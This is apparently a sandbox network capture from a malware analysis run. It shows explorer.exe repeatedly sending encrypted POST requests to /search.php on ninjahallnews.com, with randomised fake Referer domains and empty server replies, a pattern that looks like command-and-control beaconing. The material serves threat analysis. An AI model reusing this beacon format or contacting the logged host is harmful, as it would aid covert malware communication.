                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 221
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:43 UTC221OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 70 ab 36 b4 db ac 42 5b e6 2c 7f 97 78 e1 ef 33 04 fa 3d 17 33 d5 eb c7 7b b2 a3 7b 1c 80 fa 2c ad 2c 27 f2 e5 10 79 29 63 06 05 cb 79 da 90 b0 42 d3 e2 4d 75 0f e4 6b 27 d1 28 68 f8 fd 84 81 4a 3a d4 0b f9 24 fa 04 28 d5 4c a3 3a 74 2c 7a 59 ee ce 09 f2 8d 24 84 4a 0b e7 d8 a9 25 ac a2 0b ba 82 fa cb 55 57 8f d7 87 5c 2c a7 0a 4d ee 75 65 2f e9 23 13 49 cd 3f 30 36 d9 bb e2 3a 22 c3 ac 65 be 60 97 e4 d8 08 15 69 29 b4 7f 47
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lj4%<p6B[,x3=3{{,,'y)cyBMuk'(hJ:$(L:t,zY$J%UW\,Mue/#I?06:"e`i)G
                                                                                                      2024-10-07 22:20:44 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:44 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.44989823.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:44 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://wuojfsenfaf.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 131
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:44 UTC131OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 4d d5 3b f4 ca f0 24 3c e2 18 6f fa 3d c1 eb 1c 73 ed 14 33 74 be e4 d4 72 fa de 13 79 d4 e1 36 b7 30 7e fd 8c 54 75 3d 79 07 0f d2 0f c2 86 9d 49 fa fd 5e 40
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lk4%<M;$<o=s3try60~Tu=yI^@
                                                                                                      2024-10-07 22:20:45 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:45 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.44990223.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:45 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mxlgirixfokriwnb.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 253
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:45 UTC253OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 6d c3 73 e1 93 c7 12 56 be 2b 73 8f 5d 9f f8 64 7e c7 12 01 3c cd b1 f7 4e c0 a9 02 67 83 f2 36 87 77 2b f9 98 76 37 42 45 3c 0a c2 2f ca d6 ce 0a ce b9 51 32 4e 92 5b 35 db 6e 40 ea 8c a3 80 56 1f c2 0e b2 4f ff 70 7c 8f 0b db 6e 6f 67 74 69 af f4 4c e8 aa 2a 97 38 01 c3 ac 96 24 ac ac 7e aa a3 a0 cd 2a 70 8c bf 82 79 29 ac 49 31 e1 2b 65 56 e2 6c 06 43 df 4b 14 04 d9 cd db 15 7b b4 d8 0b f2 7b f3 b5 a5 7b 0e 31 6c a5 1c 29 11 1b 65 ef 3c 8f b4 1d 12 15 4e 2a dc ad 3a 77 04 40 b3 91 e1 05 e4 fd 75 e1 4e cd b9 a2 81 2b
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lh4%<msV+s]d~<Ng6w+v7BE</Q2N[5n@VOp|nogtiL*8$~*py)I1+eVlCK{{{1l)e<N*:w@uN+
                                                                                                      2024-10-07 22:20:46 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:46 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.44991323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:46 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://uefyjrrvgteesaeq.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 332
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:46 UTC332OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 61 fd 17 a4 8d f4 42 5f d4 78 20 b7 38 f2 80 29 09 d2 70 54 33 dd e5 e1 32 de c1 58 07 cc fd 31 8e 48 52 84 85 75 7b 56 6e 20 0d f4 2f d1 81 bb 5b f6 f6 25 76 0b ef 7f 07 f6 75 6f fa 86 82 9f 39 38 84 6c be 36 e8 67 69 8e 10 c2 37 41 4b 35 44 f7 a6 07 e9 c0 3c f2 3c 3d d1 a2 d8 55 c6 fb 0c b0 b8 99 c7 18 42 a6 db c6 7b 30 c4 58 21 8e 77 05 3c f5 28 76 3c a8 31 7f 49 e9 8e 94 70 63 bc a9 6c fe 42 88 c0 a5 68 77 16 2f d7 5d 63 0d 5d 19 e7 57 e7 df 13 26 13 78 3d d1 8b 3e 6f 2e 0e 95 9d c4 22 93 af 6e d0 62 a7 e6 d3 d8 60 a4 6d
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Li4%<aB_x 8)pT32X1HRu{Vn /[%vuo98l6gi7AK5D<<=UB{0X!w<(v<1IpclBhw/]c]W&x=>o."nb`m
                                                                                                      2024-10-07 22:20:46 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:46 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.44991923.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:47 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://nnyeswfjrdkwqexg.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 311
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:47 UTC311OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 37 ea 16 f3 a8 fc 5a 39 e1 1a 09 fc 51 d5 cd 78 15 e8 0e 21 2a c9 fd 92 21 c5 a4 69 11 e3 f0 70 9c 72 33 b1 89 4e 3d 62 15 21 04 88 07 ba 87 da 54 cd e1 45 03 22 98 04 28 a1 46 1c 83 f1 98 db 3b 05 d7 76 be 55 97 6b 59 c7 00 af 6e 2a 46 0e 68 f2 e1 1f 8b c7 0c f6 19 2b fc e6 88 26 f9 85 12 b4 bb a4 b7 00 38 b9 91 ac 6e 09 9a 4d 09 c1 0b 07 2e 84 4c 0c 68 b3 3a 28 35 fb bf 88 65 40 94 ea 3a f7 39 8b a9 e6 28 72 05 22 a1 6e 2b 1a 53 0a f1 5b f8 96 0c 39 32 35 39 99 a0 50 2d 4c 1f 91 f1 c0 28 d9 fd 03 9d 3c db 8e e2 bd 5d 92 53
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Ln4%<7Z9Qx!*!ipr3N=b!TE"(F;vUkYn*Fh+&8nM.Lh:(5e@:9(r"n+S[9259P-L(<]S
                                                                                                      2024-10-07 22:20:47 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:47 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.44992523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:49 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://opoqwbbwkupiok.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 273
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:49 UTC273OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3d aa 7c ba c9 b5 22 23 ed 37 71 a7 24 97 86 30 13 a0 77 38 55 c6 cc 98 68 bb de 7f 52 9d 88 71 b4 71 79 e5 82 62 2b 29 09 1c 07 f5 3d a5 ec a2 4d d3 be 4e 23 3a ee 64 24 dd 53 59 fc 80 e9 d4 0e 1f a3 14 e5 7f ad 65 63 ad 4c dc 28 44 23 09 72 ec e9 7e 93 b4 12 8f 53 62 d0 a0 9d 48 d7 a5 05 ae d1 a7 a8 04 69 ba 8d a1 4d 59 a3 6c 21 ff 67 6e 0a e6 38 71 3a f2 49 17 2a ed cf 81 0b 60 92 fb 7e ac 58 c6 a2 e2 67 74 20 36 c1 0d 11 4e 08 33 c7 0c 97 a5 06 43 34 74 32 c0 88 7c 6e 3a 37 93 95 f3 1b c9 bf 08 df 47 af b2 a1 88 77 cc 3a
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lo4%<=|"#7q$0w8UhRqqyb+)=MN#:d$SYecL(D#r~SbHiMYl!gn8q:I*`~Xgt 6N3C4t2|n:7Gw:
                                                                                                      2024-10-07 22:20:49 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:49 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.44993123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:50 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://lrhrxwfbfqiw.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 321
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:50 UTC321OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 75 db 3e e6 b3 ca 31 2f bd 11 1a b2 55 c8 d7 32 63 ab 6e 27 40 cf a0 cf 21 ef c3 79 18 e6 f2 49 ae 32 51 a8 91 7b 2a 3f 47 4b 3a e9 74 9e d3 aa 5e 90 f1 64 1d 3c ac 16 13 f4 5a 1c c5 fa a3 99 21 12 8c 5f ac 75 ee 0b 6a c3 2c da 32 2f 6a 37 42 b2 e3 06 ad d8 63 ef 25 6a 84 d9 ae 3f da 9d 5c f0 ca 89 c1 29 46 c6 d1 ad 09 08 c3 53 13 90 60 65 38 99 49 12 5d b7 18 33 18 9c bc d7 6b 36 b1 da 3a 92 54 e1 ea a9 0c 3e 26 33 d6 5c 1d 02 5e 16 bc 0e 9b 9b 77 57 1d 25 58 fc 83 67 23 50 56 c8 98 ff 43 e9 fa 38 ef 39 8a ba c1 cb 65 cf 6a
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Ll4%<u>1/U2cn'@!yI2Q{*?GK:t^d<Z!_uj,2/j7Bc%j?\)FS`e8I]3k6:T>&3\^wW%Xg#PVC89ej
                                                                                                      2024-10-07 22:20:51 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:50 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.44994123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:51 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mjscupccgtmnwxhe.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 369
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:51 UTC369OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 7f d1 0a a5 80 f9 32 23 a3 6b 13 a6 7e c9 99 06 0a ff 74 0e 63 93 be 91 7a d1 d7 11 59 80 ec 3b e6 69 2a f9 8b 51 32 79 0d 00 34 f8 38 dc cf cd 5e 81 bb 6f 2f 53 a4 57 59 a2 29 75 98 c2 9b 9f 01 06 a4 6f e8 3f 90 31 3d 9e 1f 82 76 5e 3c 7a 71 e7 d8 77 f9 cd 6d c8 2b 02 95 d7 ce 28 d8 81 4c fb b0 94 b5 48 55 88 cf d3 61 1a cc 62 54 88 02 75 3d b4 43 0c 7f ad 42 77 33 e9 97 d8 18 44 bb aa 1e ab 43 d3 dc ce 27 63 1c 4c f9 7a 79 74 25 35 db 4c 80 aa 07 46 2d 45 0f 93 84 53 7d 31 27 bb d1 c5 1c c9 d2 20 88 7f b9 a8 ad d0 4f a2 3f
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lm4%<2#k~tczY;i*Q2y48^o/SWY)uo?1=v^<zqwm+(LHUabTu=CBw3DC'cLzyt%5LF-ES}1' O?
                                                                                                      2024-10-07 22:20:51 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:51 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.44994823.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:52 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mygtgmevqgkpxy.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 150
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:52 UTC150OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 45 cc 7f a5 84 da 4b 54 ad 15 3f 9d 28 eb 92 2d 06 fd 66 09 52 c5 be e3 2d ec fe 65 43 94 e4 41 b1 60 24 b2 9e 00 20 24 1f 0f 0e fb 39 94 fa af 2c 9d ea 63 33 47 f7 62 2e fe 22 6d 9e 80 89 8f 5e 6b b6 0a e2 77 f9 57
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lb4%<EKT?(-fR-eCA`$ $9,c3Gb."m^kwW
                                                                                                      2024-10-07 22:20:52 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:52 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.44995423.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:53 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://jqllhnybwxcxea.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 366
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:53 UTC366OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 4d c9 3c a5 b5 fc 2a 2b c5 6c 69 b3 3d f8 c7 3e 62 d8 0f 11 44 da e1 ea 77 bc e7 60 44 9d 97 5f e5 28 70 fb dc 08 2a 62 1a 11 5d 9d 3b d6 cb d6 13 e5 91 2d 7d 31 ee 62 5a ec 49 6c e8 cd f4 86 50 3c d9 65 b6 55 eb 24 7e a7 2d cf 7a 60 3c 39 04 af ca 67 ff c9 0f f0 36 7d f0 ee 86 4b e9 a4 7e b4 8e 86 d0 05 66 d1 92 82 7f 34 a0 61 49 f8 2e 73 58 82 58 0c 4b b8 16 6c 0c 9e a1 f1 05 37 ab b2 19 be 5d f9 fb e2 32 19 2e 3e b0 01 03 08 43 28 bf 16 ab c9 13 59 63 29 07 f7 e8 47 2c 3d 59 bf 9d f9 51 d2 ce 69 e9 63 95 87 d2 cc 1c ba 72
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lc4%<M<*+li=>bDw`D_(p*b];-}1bZIlP<eU$~-z`<9g6}K~f4aI.sXXKl7]2.>C(Yc)G,=YQicr
                                                                                                      2024-10-07 22:20:53 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:53 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.44996023.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:55 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://pupdhamncbgqgk.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 306
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:55 UTC306OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 66 ad 05 b0 b1 ab 10 3e b9 02 03 e5 46 97 e0 39 00 cb 7c 3d 76 d2 d0 9c 79 d4 d9 14 41 fe ba 7d 88 26 63 f3 de 6a 10 40 13 40 45 9c 2c a3 cd 81 16 85 b6 4c 2f 1e e8 6a 31 e4 6a 52 df 86 9f 81 21 15 d5 51 d5 5d ea 05 31 81 4b a6 62 42 67 3c 56 d1 b4 41 8a 97 07 d6 1f 02 97 ae a9 51 b2 bf 04 b1 ce e8 d5 4d 52 c4 aa af 6a 5c c3 1c 45 db 7e 08 2e b6 7b 61 5f b6 4c 6e 28 d3 bc 8e 76 4f 8d af 0e 92 35 ca e0 f5 37 14 19 55 b0 57 70 05 50 7e d7 1f 83 b3 60 0c 01 21 4e e5 ac 64 26 38 2b ca 9f ef 0c c9 b6 70 da 47 8f 80 b2 da 7c 8e 73
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@L`4%<f>F9|=vyA}&cj@@E,L/j1jR!Q]1KbBg<VAQMRj\E~.{a_Ln(vO57UWpP~`!Nd&8+pG|s
                                                                                                      2024-10-07 22:20:55 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:55 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 0
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.44996623.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:56 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://lhkhfhdvkorst.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 327
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:56 UTC327OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 4f ed 76 b8 a8 bb 3e 58 d4 01 7f ee 37 e8 8a 63 32 c3 67 0c 41 aa de e1 44 ac f6 40 74 f2 f5 36 8b 7b 33 8f f0 06 32 3b 4c 5c 3f d9 32 c0 f3 c1 32 98 9b 77 39 4d 89 68 35 f0 35 0a 89 f9 e9 c7 00 16 d6 7d a4 7d be 73 73 c4 45 91 5f 20 3d 6f 1a b2 b8 69 83 8a 10 97 38 3d c9 b6 af 09 ea 92 46 ad d1 fd cf 25 35 de ad d3 18 43 b3 6c 06 84 68 63 19 a3 56 3e 6c ac 4b 37 58 f8 9b d9 0b 75 9c f7 21 a3 22 e9 e6 f9 13 1d 18 74 dc 60 6f 61 42 25 b0 4e 8a d2 62 3e 69 43 35 ee 92 60 63 32 06 cb c8 c5 16 d0 c4 2f dc 22 b6 f3 d6 cd 4f b0 77
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[@La4%<Ov>X7c2gAD@t6{32;L\?22w9Mh55}}ssE_ =oi8=F%5ClhcV>lK7Xu!"t`oaB%Nb>iC5`c2/"Ow
                                                                                                      2024-10-07 22:20:56 UTC278INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:56 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
